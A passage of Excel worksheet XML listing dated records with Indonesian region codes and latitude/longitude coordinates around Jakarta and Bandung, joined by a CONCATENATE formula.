      <c r="T380" t="s">
        <v>33</v>
      </c>
      <c r="U380" s="5">
        <v>10686539</v>
      </c>
      <c r="V380" s="5" t="s">
        <v>14555</v>
      </c>
      <c r="W380" s="5">
        <v>-617469</v>
      </c>
      <c r="X380" t="s">
        <v>18368</v>
      </c>
      <c r="Y380" t="str">
        <f t="shared" si="5"/>
        <v>-6.17469,106.86539</v>
      </c>
    </row>
    <row r="381" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A381">
        <v>102009</v>
      </c>
      <c r="B381" s="1">
        <v>43854</v>
      </c>
      <c r="C381" s="2">
        <v>0.2949074074074074</v>
      </c>
      <c r="D381" t="s">
        <v>22</v>
      </c>
      <c r="E381" t="s">
        <v>23</v>
      </c>
      <c r="F381" t="s">
        <v>1757</v>
      </c>
      <c r="H381" t="s">
        <v>26</v>
      </c>
      <c r="I381" t="s">
        <v>1758</v>
      </c>
      <c r="J381" t="s">
        <v>1759</v>
      </c>
      <c r="L381" t="s">
        <v>1760</v>
      </c>
      <c r="M381">
        <v>3174060002</v>
      </c>
      <c r="N381">
        <v>3174060</v>
      </c>
      <c r="O381">
        <v>3174</v>
      </c>
      <c r="P381">
        <v>31</v>
      </c>
      <c r="Q381" t="s">
        <v>1761</v>
      </c>
      <c r="R381" t="s">
        <v>1762</v>
      </c>
      <c r="S381" t="s">
        <v>32</v>
      </c>
      <c r="T381" t="s">
        <v>33</v>
      </c>
      <c r="U381" s="5">
        <v>10681963</v>
      </c>
      <c r="V381" s="5" t="s">
        <v>14803</v>
      </c>
      <c r="W381" s="5">
        <v>-615543</v>
      </c>
      <c r="X381" t="s">
        <v>18612</v>
      </c>
      <c r="Y381" t="str">
        <f t="shared" si="5"/>
        <v>-6.15543,106.81963</v>
      </c>
    </row>
    <row r="382" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A382">
        <v>102010</v>
      </c>
      <c r="B382" s="1">
        <v>43854</v>
      </c>
      <c r="C382" s="2">
        <v>0.30224537037037036</v>
      </c>
      <c r="D382" t="s">
        <v>22</v>
      </c>
      <c r="E382" t="s">
        <v>23</v>
      </c>
      <c r="F382" t="s">
        <v>1763</v>
      </c>
      <c r="H382" t="s">
        <v>26</v>
      </c>
      <c r="I382" t="s">
        <v>974</v>
      </c>
      <c r="J382" t="s">
        <v>586</v>
      </c>
      <c r="L382" t="s">
        <v>1764</v>
      </c>
      <c r="M382">
        <v>3173050002</v>
      </c>
      <c r="N382">
        <v>3173050</v>
      </c>
      <c r="O382">
        <v>3173</v>
      </c>
      <c r="P382">
        <v>31</v>
      </c>
      <c r="Q382" t="s">
        <v>588</v>
      </c>
      <c r="R382" t="s">
        <v>589</v>
      </c>
      <c r="S382" t="s">
        <v>62</v>
      </c>
      <c r="T382" t="s">
        <v>33</v>
      </c>
      <c r="U382" s="5">
        <v>10686539</v>
      </c>
      <c r="V382" s="5" t="s">
        <v>14555</v>
      </c>
      <c r="W382" s="5">
        <v>-617469</v>
      </c>
      <c r="X382" t="s">
        <v>18368</v>
      </c>
      <c r="Y382" t="str">
        <f t="shared" si="5"/>
        <v>-6.17469,106.86539</v>
      </c>
    </row>
    <row r="383" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A383">
        <v>102011</v>
      </c>
      <c r="B383" s="1">
        <v>43854</v>
      </c>
      <c r="C383" s="2">
        <v>0.30462962962962964</v>
      </c>
      <c r="D383" t="s">
        <v>22</v>
      </c>
      <c r="E383" t="s">
        <v>23</v>
      </c>
      <c r="F383" t="s">
        <v>1765</v>
      </c>
      <c r="G383" t="s">
        <v>1766</v>
      </c>
      <c r="H383" t="s">
        <v>26</v>
      </c>
      <c r="I383" t="s">
        <v>1513</v>
      </c>
      <c r="J383" t="s">
        <v>1767</v>
      </c>
      <c r="L383" t="s">
        <v>1768</v>
      </c>
      <c r="M383">
        <v>3174070006</v>
      </c>
      <c r="N383">
        <v>3174070</v>
      </c>
      <c r="O383">
        <v>3174</v>
      </c>
      <c r="P383">
        <v>31</v>
      </c>
      <c r="Q383" t="s">
        <v>595</v>
      </c>
      <c r="R383" t="s">
        <v>84</v>
      </c>
      <c r="S383" t="s">
        <v>32</v>
      </c>
      <c r="T383" t="s">
        <v>33</v>
      </c>
      <c r="U383" s="5">
        <v>10672427</v>
      </c>
      <c r="V383" s="5" t="s">
        <v>14804</v>
      </c>
      <c r="W383" s="5">
        <v>-612701</v>
      </c>
      <c r="X383" t="s">
        <v>18613</v>
      </c>
      <c r="Y383" t="str">
        <f t="shared" si="5"/>
        <v>-6.12701,106.72427</v>
      </c>
    </row>
    <row r="384" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A384">
        <v>102012</v>
      </c>
      <c r="B384" s="1">
        <v>43854</v>
      </c>
      <c r="C384" s="2">
        <v>0.31511574074074072</v>
      </c>
      <c r="D384" t="s">
        <v>22</v>
      </c>
      <c r="E384" t="s">
        <v>23</v>
      </c>
      <c r="F384" t="s">
        <v>1769</v>
      </c>
      <c r="G384" t="s">
        <v>1770</v>
      </c>
      <c r="H384" t="s">
        <v>26</v>
      </c>
      <c r="I384" t="s">
        <v>354</v>
      </c>
      <c r="J384" t="s">
        <v>1771</v>
      </c>
      <c r="L384" t="s">
        <v>1772</v>
      </c>
      <c r="M384">
        <v>3172100005</v>
      </c>
      <c r="N384">
        <v>3172100</v>
      </c>
      <c r="O384">
        <v>3172</v>
      </c>
      <c r="P384">
        <v>31</v>
      </c>
      <c r="Q384" t="s">
        <v>1773</v>
      </c>
      <c r="R384" t="s">
        <v>1436</v>
      </c>
      <c r="S384" t="s">
        <v>49</v>
      </c>
      <c r="T384" t="s">
        <v>33</v>
      </c>
      <c r="U384" s="5">
        <v>10687165</v>
      </c>
      <c r="V384" s="5" t="s">
        <v>14805</v>
      </c>
      <c r="W384" s="5">
        <v>-620885</v>
      </c>
      <c r="X384" t="s">
        <v>18614</v>
      </c>
      <c r="Y384" t="str">
        <f t="shared" si="5"/>
        <v>-6.20885,106.87165</v>
      </c>
    </row>
    <row r="385" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A385">
        <v>102013</v>
      </c>
      <c r="B385" s="1">
        <v>43854</v>
      </c>
      <c r="C385" s="2">
        <v>0.3243287037037037</v>
      </c>
      <c r="D385" t="s">
        <v>22</v>
      </c>
      <c r="E385" t="s">
        <v>23</v>
      </c>
      <c r="F385" t="s">
        <v>1774</v>
      </c>
      <c r="G385" t="s">
        <v>1775</v>
      </c>
      <c r="H385" t="s">
        <v>26</v>
      </c>
      <c r="I385" t="s">
        <v>511</v>
      </c>
      <c r="J385" t="s">
        <v>1776</v>
      </c>
      <c r="L385" t="s">
        <v>1777</v>
      </c>
      <c r="M385">
        <v>3171090004</v>
      </c>
      <c r="N385">
        <v>3171090</v>
      </c>
      <c r="O385">
        <v>3171</v>
      </c>
      <c r="P385">
        <v>31</v>
      </c>
      <c r="Q385" t="s">
        <v>1074</v>
      </c>
      <c r="R385" t="s">
        <v>347</v>
      </c>
      <c r="S385" t="s">
        <v>108</v>
      </c>
      <c r="T385" t="s">
        <v>33</v>
      </c>
      <c r="U385" s="5">
        <v>10685863</v>
      </c>
      <c r="V385" s="5" t="s">
        <v>14806</v>
      </c>
      <c r="W385" s="5">
        <v>-622898</v>
      </c>
      <c r="X385" t="s">
        <v>18615</v>
      </c>
      <c r="Y385" t="str">
        <f t="shared" si="5"/>
        <v>-6.22898,106.85863</v>
      </c>
    </row>
    <row r="386" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A386">
        <v>102015</v>
      </c>
      <c r="B386" s="1">
        <v>43854</v>
      </c>
      <c r="C386" s="2">
        <v>0.37491898148148151</v>
      </c>
      <c r="D386" t="s">
        <v>85</v>
      </c>
      <c r="E386" t="s">
        <v>23</v>
      </c>
      <c r="F386" t="s">
        <v>1778</v>
      </c>
      <c r="G386" t="s">
        <v>1779</v>
      </c>
      <c r="H386" t="s">
        <v>26</v>
      </c>
      <c r="J386" t="s">
        <v>37</v>
      </c>
      <c r="K386" t="s">
        <v>1780</v>
      </c>
      <c r="L386" t="s">
        <v>1781</v>
      </c>
      <c r="M386">
        <v>3603210005</v>
      </c>
      <c r="N386">
        <v>3603210</v>
      </c>
      <c r="O386">
        <v>3603</v>
      </c>
      <c r="P386">
        <v>36</v>
      </c>
      <c r="Q386" t="s">
        <v>1782</v>
      </c>
      <c r="R386" t="s">
        <v>1727</v>
      </c>
      <c r="S386" t="s">
        <v>201</v>
      </c>
      <c r="T386" t="s">
        <v>171</v>
      </c>
      <c r="U386" s="5">
        <v>10669835</v>
      </c>
      <c r="V386" s="5" t="s">
        <v>14807</v>
      </c>
      <c r="W386" s="5">
        <v>-609339</v>
      </c>
      <c r="X386" t="s">
        <v>18616</v>
      </c>
      <c r="Y386" t="str">
        <f t="shared" si="5"/>
        <v>-6.09339,106.69835</v>
      </c>
    </row>
    <row r="387" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A387">
        <v>102016</v>
      </c>
      <c r="B387" s="1">
        <v>43854</v>
      </c>
      <c r="C387" s="2">
        <v>0.39800925925925923</v>
      </c>
      <c r="D387" t="s">
        <v>22</v>
      </c>
      <c r="E387" t="s">
        <v>23</v>
      </c>
      <c r="F387" t="s">
        <v>1783</v>
      </c>
      <c r="H387" t="s">
        <v>26</v>
      </c>
      <c r="I387" t="s">
        <v>72</v>
      </c>
      <c r="J387" t="s">
        <v>1460</v>
      </c>
      <c r="L387" t="s">
        <v>1784</v>
      </c>
      <c r="M387">
        <v>3204270004</v>
      </c>
      <c r="N387">
        <v>3204270</v>
      </c>
      <c r="O387">
        <v>3204</v>
      </c>
      <c r="P387">
        <v>32</v>
      </c>
      <c r="Q387" t="s">
        <v>1785</v>
      </c>
      <c r="R387" t="s">
        <v>1785</v>
      </c>
      <c r="S387" t="s">
        <v>1464</v>
      </c>
      <c r="T387" t="s">
        <v>42</v>
      </c>
      <c r="U387" s="5">
        <v>10762118</v>
      </c>
      <c r="V387" s="5" t="s">
        <v>14808</v>
      </c>
      <c r="W387" s="5">
        <v>-698646</v>
      </c>
      <c r="X387" t="s">
        <v>18617</v>
      </c>
      <c r="Y387" t="str">
        <f t="shared" ref="Y387:Y450" si="6">CONCATENATE(X387,",",V387)</f>
        <v>-6.98646,107.62118</v>
      </c>
    </row>
    <row r="388" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A388">
        <v>102017</v>
      </c>
      <c r="B388" s="1">
        <v>43854</v>
      </c>
      <c r="C388" s="2">
        <v>0.40947916666666667</v>
      </c>
      <c r="D388" t="s">
        <v>22</v>
      </c>
      <c r="E388" t="s">
        <v>23</v>
      </c>
      <c r="F388" t="s">
        <v>1786</v>
      </c>
      <c r="G388" t="s">
        <v>1787</v>
      </c>
      <c r="H388" t="s">
        <v>26</v>
      </c>
      <c r="I388" t="s">
        <v>58</v>
      </c>
      <c r="J388" t="s">
        <v>1788</v>
      </c>
      <c r="M388">
        <v>3175050003</v>
      </c>
      <c r="N388">
        <v>3175050</v>
      </c>
      <c r="O388">
        <v>3175</v>
      </c>
      <c r="P388">
        <v>31</v>
      </c>
      <c r="Q388" t="s">
        <v>1740</v>
      </c>
      <c r="R388" t="s">
        <v>1013</v>
      </c>
      <c r="S388" t="s">
        <v>547</v>
      </c>
      <c r="T388" t="s">
        <v>33</v>
      </c>
      <c r="U388" s="5">
        <v>10691031</v>
      </c>
      <c r="V388" s="5" t="s">
        <v>14809</v>
      </c>
      <c r="W388" s="5">
        <v>-615081</v>
      </c>
      <c r="X388" t="s">
        <v>18618</v>
      </c>
      <c r="Y388" t="str">
        <f t="shared" si="6"/>
        <v>-6.15081,106.91031</v>
      </c>
    </row>
    <row r="389" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A389">
        <v>102018</v>
      </c>
      <c r="B389" s="1">
        <v>43854</v>
      </c>
      <c r="C389" s="2">
        <v>0.5140393518518519</v>
      </c>
      <c r="D389" t="s">
        <v>85</v>
      </c>
      <c r="E389" t="s">
        <v>23</v>
      </c>
      <c r="F389" t="s">
        <v>1789</v>
      </c>
      <c r="G389" t="s">
        <v>1790</v>
      </c>
      <c r="H389" t="s">
        <v>26</v>
      </c>
      <c r="J389" t="s">
        <v>778</v>
      </c>
      <c r="K389" t="s">
        <v>1791</v>
      </c>
      <c r="L389" t="s">
        <v>1792</v>
      </c>
      <c r="M389">
        <v>3171070004</v>
      </c>
      <c r="N389">
        <v>3171070</v>
      </c>
      <c r="O389">
        <v>3171</v>
      </c>
      <c r="P389">
        <v>31</v>
      </c>
      <c r="Q389" t="s">
        <v>121</v>
      </c>
      <c r="R389" t="s">
        <v>121</v>
      </c>
      <c r="S389" t="s">
        <v>108</v>
      </c>
      <c r="T389" t="s">
        <v>33</v>
      </c>
      <c r="U389" s="5">
        <v>10682996</v>
      </c>
      <c r="V389" s="5" t="s">
        <v>14810</v>
      </c>
      <c r="W389" s="5">
        <v>-624140</v>
      </c>
      <c r="X389" t="s">
        <v>18619</v>
      </c>
      <c r="Y389" t="str">
        <f t="shared" si="6"/>
        <v>-6.24140,106.82996</v>
      </c>
    </row>
    <row r="390" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A390">
        <v>102020</v>
      </c>
      <c r="B390" s="1">
        <v>43854</v>
      </c>
      <c r="C390" s="2">
        <v>0.7492361111111111</v>
      </c>
      <c r="D390" t="s">
        <v>22</v>
      </c>
      <c r="E390" t="s">
        <v>23</v>
      </c>
      <c r="F390" s="3" t="s">
        <v>1793</v>
      </c>
      <c r="H390" t="s">
        <v>26</v>
      </c>
      <c r="I390" t="s">
        <v>555</v>
      </c>
      <c r="J390" t="s">
        <v>1460</v>
      </c>
      <c r="L390" t="s">
        <v>1794</v>
      </c>
      <c r="M390">
        <v>3211020001</v>
      </c>
      <c r="N390">
        <v>3211020</v>
      </c>
      <c r="O390">
        <v>3211</v>
      </c>
      <c r="P390">
        <v>32</v>
      </c>
      <c r="Q390" t="s">
        <v>1795</v>
      </c>
      <c r="R390" t="s">
        <v>1796</v>
      </c>
      <c r="S390" t="s">
        <v>1797</v>
      </c>
      <c r="T390" t="s">
        <v>42</v>
      </c>
      <c r="U390" s="5">
        <v>10779766</v>
      </c>
      <c r="V390" s="5" t="s">
        <v>14811</v>
      </c>
      <c r="W390" s="5">
        <v>-696352</v>
      </c>
      <c r="X390" t="s">
        <v>18620</v>
      </c>
      <c r="Y390" t="str">
        <f t="shared" si="6"/>
        <v>-6.96352,107.79766</v>
      </c>
    </row>
    <row r="391" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A391">
        <v>102031</v>
      </c>
      <c r="B391" s="1">
        <v>43856</v>
      </c>
      <c r="C391" s="2">
        <v>7.8043981481481492E-2</v>
      </c>
      <c r="D391" t="s">
        <v>22</v>
      </c>
      <c r="E391" t="s">
        <v>23</v>
      </c>
      <c r="F391" t="s">
        <v>1798</v>
      </c>
      <c r="G391" t="s">
        <v>1799</v>
      </c>
      <c r="H391" t="s">
        <v>26</v>
      </c>
      <c r="I391" t="s">
        <v>1080</v>
      </c>
      <c r="J391" t="s">
        <v>1460</v>
      </c>
      <c r="L391" t="s">
        <v>1800</v>
      </c>
      <c r="M391">
        <v>3204130008</v>
      </c>
      <c r="N391">
        <v>3204130</v>
      </c>
      <c r="O391">
        <v>3204</v>
      </c>
      <c r="P391">
        <v>32</v>
      </c>
      <c r="Q391" t="s">
        <v>1801</v>
      </c>
      <c r="R391" t="s">
        <v>1802</v>
      </c>
      <c r="S391" t="s">
        <v>1464</v>
      </c>
      <c r="T391" t="s">
        <v>42</v>
      </c>
      <c r="U391" s="5">
        <v>10770435</v>
      </c>
      <c r="V391" s="5" t="s">
        <v>14812</v>
      </c>
      <c r="W391" s="5">
        <v>-699101</v>
      </c>
      <c r="X391" t="s">
        <v>18621</v>
      </c>
      <c r="Y391" t="str">
        <f t="shared" si="6"/>
        <v>-6.99101,107.70435</v>
      </c>
    </row>
    <row r="392" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A392">
        <v>102032</v>
      </c>
      <c r="B392" s="1">
        <v>43856</v>
      </c>
      <c r="C392" s="2">
        <v>0.10643518518518519</v>
      </c>
      <c r="D392" t="s">
        <v>22</v>
      </c>
      <c r="E392" t="s">
        <v>23</v>
      </c>
      <c r="F392" t="s">
        <v>1803</v>
      </c>
      <c r="G392" t="s">
        <v>1804</v>
      </c>
      <c r="H392" t="s">
        <v>26</v>
      </c>
      <c r="I392" t="s">
        <v>666</v>
      </c>
      <c r="J392" t="s">
        <v>1460</v>
      </c>
      <c r="L392" t="s">
        <v>1805</v>
      </c>
      <c r="M392">
        <v>3204280006</v>
      </c>
      <c r="N392">
        <v>3204280</v>
      </c>
      <c r="O392">
        <v>3204</v>
      </c>
      <c r="P392">
        <v>32</v>
      </c>
      <c r="Q392" t="s">
        <v>1806</v>
      </c>
      <c r="R392" t="s">
        <v>1807</v>
      </c>
      <c r="S392" t="s">
        <v>1464</v>
      </c>
      <c r="T392" t="s">
        <v>42</v>
      </c>
      <c r="U392" s="5">
        <v>10768683</v>
      </c>
      <c r="V392" s="5" t="s">
        <v>14813</v>
      </c>
      <c r="W392" s="5">
        <v>-698010</v>
      </c>
      <c r="X392" t="s">
        <v>18622</v>
      </c>
      <c r="Y392" t="str">
        <f t="shared" si="6"/>
        <v>-6.98010,107.68683</v>
      </c>
    </row>
    <row r="393" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A393">
        <v>102033</v>
      </c>
      <c r="B393" s="1">
        <v>43856</v>
      </c>
      <c r="C393" s="2">
        <v>0.23724537037037038</v>
      </c>
      <c r="D393" t="s">
        <v>22</v>
      </c>
      <c r="E393" t="s">
        <v>23</v>
      </c>
      <c r="F393" t="s">
        <v>1808</v>
      </c>
      <c r="H393" t="s">
        <v>26</v>
      </c>
      <c r="I393" t="s">
        <v>1809</v>
      </c>
      <c r="J393" t="s">
        <v>1460</v>
      </c>
      <c r="L393" t="s">
        <v>1810</v>
      </c>
      <c r="M393">
        <v>3204270005</v>
      </c>
      <c r="N393">
        <v>3204270</v>
      </c>
      <c r="O393">
        <v>3204</v>
      </c>
      <c r="P393">
        <v>32</v>
      </c>
      <c r="Q393" t="s">
        <v>1811</v>
      </c>
      <c r="R393" t="s">
        <v>1785</v>
      </c>
      <c r="S393" t="s">
        <v>1464</v>
      </c>
      <c r="T393" t="s">
        <v>42</v>
      </c>
      <c r="U393" s="5">
        <v>10762060</v>
      </c>
      <c r="V393" s="5" t="s">
        <v>14814</v>
      </c>
      <c r="W393" s="5">
        <v>-698127</v>
      </c>
      <c r="X393" t="s">
        <v>18623</v>
      </c>
      <c r="Y393" t="str">
        <f t="shared" si="6"/>
        <v>-6.98127,107.62060</v>
      </c>
    </row>
    <row r="394" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A394">
        <v>102045</v>
      </c>
      <c r="B394" s="1">
        <v>43856</v>
      </c>
      <c r="C394" s="2">
        <v>0.51832175925925927</v>
      </c>
      <c r="D394" t="s">
        <v>22</v>
      </c>
      <c r="E394" t="s">
        <v>23</v>
      </c>
      <c r="F394" t="s">
        <v>1812</v>
      </c>
      <c r="G394" t="s">
        <v>1813</v>
      </c>
      <c r="H394" t="s">
        <v>26</v>
      </c>
      <c r="I394" t="s">
        <v>1046</v>
      </c>
      <c r="J394" t="s">
        <v>37</v>
      </c>
      <c r="M394">
        <v>3674030002</v>
      </c>
      <c r="N394">
        <v>3674030</v>
      </c>
      <c r="O394">
        <v>3674</v>
      </c>
      <c r="P394">
        <v>36</v>
      </c>
      <c r="Q394" t="s">
        <v>1814</v>
      </c>
      <c r="R394" t="s">
        <v>245</v>
      </c>
      <c r="S394" t="s">
        <v>170</v>
      </c>
      <c r="T394" t="s">
        <v>171</v>
      </c>
      <c r="U394" s="5">
        <v>10673045</v>
      </c>
      <c r="V394" s="5" t="s">
        <v>14815</v>
      </c>
      <c r="W394" s="5">
        <v>-635725</v>
      </c>
      <c r="X394" t="s">
        <v>18624</v>
      </c>
      <c r="Y394" t="str">
        <f t="shared" si="6"/>
        <v>-6.35725,106.73045</v>
      </c>
    </row>
    <row r="395" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A395">
        <v>102046</v>
      </c>
      <c r="B395" s="1">
        <v>43856</v>
      </c>
      <c r="C395" s="2">
        <v>0.52859953703703699</v>
      </c>
      <c r="D395" t="s">
        <v>22</v>
      </c>
      <c r="E395" t="s">
        <v>23</v>
      </c>
      <c r="F395" t="s">
        <v>1815</v>
      </c>
      <c r="G395" t="s">
        <v>1816</v>
      </c>
      <c r="H395" t="s">
        <v>26</v>
      </c>
      <c r="I395" t="s">
        <v>1194</v>
      </c>
      <c r="J395" t="s">
        <v>37</v>
      </c>
      <c r="L395" t="s">
        <v>1817</v>
      </c>
      <c r="M395">
        <v>3674030002</v>
      </c>
      <c r="N395">
        <v>3674030</v>
      </c>
      <c r="O395">
        <v>3674</v>
      </c>
      <c r="P395">
        <v>36</v>
      </c>
      <c r="Q395" t="s">
        <v>1814</v>
      </c>
      <c r="R395" t="s">
        <v>245</v>
      </c>
      <c r="S395" t="s">
        <v>170</v>
      </c>
      <c r="T395" t="s">
        <v>171</v>
      </c>
      <c r="U395" s="5">
        <v>10672917</v>
      </c>
      <c r="V395" s="5" t="s">
        <v>14816</v>
      </c>
      <c r="W395" s="5">
        <v>-635414</v>
      </c>
      <c r="X395" t="s">
        <v>18625</v>
      </c>
      <c r="Y395" t="str">
        <f t="shared" si="6"/>
        <v>-6.35414,106.72917</v>
      </c>
    </row>
    <row r="396" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A396">
        <v>102047</v>
      </c>
      <c r="B396" s="1">
        <v>43856</v>
      </c>
      <c r="C396" s="2">
        <v>0.54023148148148148</v>
      </c>
      <c r="D396" t="s">
        <v>22</v>
      </c>
      <c r="E396" t="s">
        <v>23</v>
      </c>
      <c r="F396" t="s">
        <v>1818</v>
      </c>
      <c r="H396" t="s">
        <v>26</v>
      </c>
      <c r="I396" t="s">
        <v>1559</v>
      </c>
      <c r="J396" t="s">
        <v>37</v>
      </c>
      <c r="L396" t="s">
        <v>1819</v>
      </c>
      <c r="M396">
        <v>3276040013</v>
      </c>
      <c r="N396">
        <v>3276040</v>
      </c>
      <c r="O396">
        <v>3276</v>
      </c>
      <c r="P396">
        <v>32</v>
      </c>
      <c r="Q396" t="s">
        <v>1820</v>
      </c>
      <c r="R396" t="s">
        <v>1821</v>
      </c>
      <c r="S396" t="s">
        <v>185</v>
      </c>
      <c r="T396" t="s">
        <v>42</v>
      </c>
      <c r="U396" s="5">
        <v>10685453</v>
      </c>
      <c r="V396" s="5" t="s">
        <v>14817</v>
      </c>
      <c r="W396" s="5">
        <v>-634430</v>
      </c>
      <c r="X396" t="s">
        <v>18626</v>
      </c>
      <c r="Y396" t="str">
        <f t="shared" si="6"/>
        <v>-6.34430,106.85453</v>
      </c>
    </row>
    <row r="397" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A397">
        <v>102048</v>
      </c>
      <c r="B397" s="1">
        <v>43856</v>
      </c>
      <c r="C397" s="2">
        <v>0.6338773148148148</v>
      </c>
      <c r="D397" t="s">
        <v>22</v>
      </c>
      <c r="E397" t="s">
        <v>23</v>
      </c>
      <c r="F397" t="s">
        <v>1822</v>
      </c>
      <c r="G397" t="s">
        <v>1823</v>
      </c>
      <c r="H397" t="s">
        <v>26</v>
      </c>
      <c r="I397" t="s">
        <v>1824</v>
      </c>
      <c r="J397" t="s">
        <v>1825</v>
      </c>
      <c r="L397" t="s">
        <v>1826</v>
      </c>
      <c r="M397">
        <v>3171030002</v>
      </c>
      <c r="N397">
        <v>3171030</v>
      </c>
      <c r="O397">
        <v>3171</v>
      </c>
      <c r="P397">
        <v>31</v>
      </c>
      <c r="Q397" t="s">
        <v>1294</v>
      </c>
      <c r="R397" t="s">
        <v>364</v>
      </c>
      <c r="S397" t="s">
        <v>108</v>
      </c>
      <c r="T397" t="s">
        <v>33</v>
      </c>
      <c r="U397" s="5">
        <v>10679763</v>
      </c>
      <c r="V397" s="5" t="s">
        <v>14818</v>
      </c>
      <c r="W397" s="5">
        <v>-630855</v>
      </c>
      <c r="X397" t="s">
        <v>18627</v>
      </c>
      <c r="Y397" t="str">
        <f t="shared" si="6"/>
        <v>-6.30855,106.79763</v>
      </c>
    </row>
    <row r="398" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A398">
        <v>102049</v>
      </c>
      <c r="B398" s="1">
        <v>43856</v>
      </c>
      <c r="C398" s="2">
        <v>0.64386574074074077</v>
      </c>
      <c r="D398" t="s">
        <v>22</v>
      </c>
      <c r="E398" t="s">
        <v>23</v>
      </c>
      <c r="F398" t="s">
        <v>1827</v>
      </c>
      <c r="H398" t="s">
        <v>26</v>
      </c>
      <c r="I398" t="s">
        <v>80</v>
      </c>
      <c r="J398" t="s">
        <v>37</v>
      </c>
      <c r="L398" t="s">
        <v>1828</v>
      </c>
      <c r="M398">
        <v>3674030002</v>
      </c>
      <c r="N398">
        <v>3674030</v>
      </c>
      <c r="O398">
        <v>3674</v>
      </c>
      <c r="P398">
        <v>36</v>
      </c>
      <c r="Q398" t="s">
        <v>1814</v>
      </c>
      <c r="R398" t="s">
        <v>245</v>
      </c>
      <c r="S398" t="s">
        <v>170</v>
      </c>
      <c r="T398" t="s">
        <v>171</v>
      </c>
      <c r="U398" s="5">
        <v>10673951</v>
      </c>
      <c r="V398" s="5" t="s">
        <v>14819</v>
      </c>
      <c r="W398" s="5">
        <v>-634829</v>
      </c>
      <c r="X398" t="s">
        <v>18628</v>
      </c>
      <c r="Y398" t="str">
        <f t="shared" si="6"/>
        <v>-6.34829,106.73951</v>
      </c>
    </row>
    <row r="399" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A399">
        <v>102050</v>
      </c>
      <c r="B399" s="1">
        <v>43856</v>
      </c>
      <c r="C399" s="2">
        <v>0.68424768518518519</v>
      </c>
      <c r="D399" t="s">
        <v>22</v>
      </c>
      <c r="E399" t="s">
        <v>23</v>
      </c>
      <c r="F399" t="s">
        <v>1829</v>
      </c>
      <c r="H399" t="s">
        <v>26</v>
      </c>
      <c r="I399" t="s">
        <v>1005</v>
      </c>
      <c r="J399" t="s">
        <v>1460</v>
      </c>
      <c r="L399" t="s">
        <v>1830</v>
      </c>
      <c r="M399">
        <v>3204270004</v>
      </c>
      <c r="N399">
        <v>3204270</v>
      </c>
      <c r="O399">
        <v>3204</v>
      </c>
      <c r="P399">
        <v>32</v>
      </c>
      <c r="Q399" t="s">
        <v>1785</v>
      </c>
      <c r="R399" t="s">
        <v>1785</v>
      </c>
      <c r="S399" t="s">
        <v>1464</v>
      </c>
      <c r="T399" t="s">
        <v>42</v>
      </c>
      <c r="U399" s="5">
        <v>10762304</v>
      </c>
      <c r="V399" s="5" t="s">
        <v>14820</v>
      </c>
      <c r="W399" s="5">
        <v>-698624</v>
      </c>
      <c r="X399" t="s">
        <v>18629</v>
      </c>
      <c r="Y399" t="str">
        <f t="shared" si="6"/>
        <v>-6.98624,107.62304</v>
      </c>
    </row>
    <row r="400" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A400">
        <v>102051</v>
      </c>
      <c r="B400" s="1">
        <v>43856</v>
      </c>
      <c r="C400" s="2">
        <v>0.68444444444444441</v>
      </c>
      <c r="D400" t="s">
        <v>22</v>
      </c>
      <c r="E400" t="s">
        <v>23</v>
      </c>
      <c r="F400" t="s">
        <v>1831</v>
      </c>
      <c r="G400" t="s">
        <v>1832</v>
      </c>
      <c r="H400" t="s">
        <v>26</v>
      </c>
      <c r="I400" t="s">
        <v>473</v>
      </c>
      <c r="J400" t="s">
        <v>368</v>
      </c>
      <c r="L400" t="s">
        <v>1833</v>
      </c>
      <c r="M400">
        <v>3171030003</v>
      </c>
      <c r="N400">
        <v>3171030</v>
      </c>
      <c r="O400">
        <v>3171</v>
      </c>
      <c r="P400">
        <v>31</v>
      </c>
      <c r="Q400" t="s">
        <v>370</v>
      </c>
      <c r="R400" t="s">
        <v>364</v>
      </c>
      <c r="S400" t="s">
        <v>108</v>
      </c>
      <c r="T400" t="s">
        <v>33</v>
      </c>
      <c r="U400" s="5">
        <v>10678792</v>
      </c>
      <c r="V400" s="5" t="s">
        <v>14821</v>
      </c>
      <c r="W400" s="5">
        <v>-630041</v>
      </c>
      <c r="X400" t="s">
        <v>18630</v>
      </c>
      <c r="Y400" t="str">
        <f t="shared" si="6"/>
        <v>-6.30041,106.78792</v>
      </c>
    </row>
    <row r="401" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A401">
        <v>102052</v>
      </c>
      <c r="B401" s="1">
        <v>43856</v>
      </c>
      <c r="C401" s="2">
        <v>0.69876157407407413</v>
      </c>
      <c r="D401" t="s">
        <v>22</v>
      </c>
      <c r="E401" t="s">
        <v>23</v>
      </c>
      <c r="F401" t="s">
        <v>1834</v>
      </c>
      <c r="G401" t="s">
        <v>1835</v>
      </c>
      <c r="H401" t="s">
        <v>26</v>
      </c>
      <c r="I401" t="s">
        <v>137</v>
      </c>
      <c r="J401" t="s">
        <v>37</v>
      </c>
      <c r="L401" t="s">
        <v>1836</v>
      </c>
      <c r="M401">
        <v>3674030003</v>
      </c>
      <c r="N401">
        <v>3674030</v>
      </c>
      <c r="O401">
        <v>3674</v>
      </c>
      <c r="P401">
        <v>36</v>
      </c>
      <c r="Q401" t="s">
        <v>244</v>
      </c>
      <c r="R401" t="s">
        <v>245</v>
      </c>
      <c r="S401" t="s">
        <v>170</v>
      </c>
      <c r="T401" t="s">
        <v>171</v>
      </c>
      <c r="U401" s="5">
        <v>10674467</v>
      </c>
      <c r="V401" s="5" t="s">
        <v>14822</v>
      </c>
      <c r="W401" s="5">
        <v>-634668</v>
      </c>
      <c r="X401" t="s">
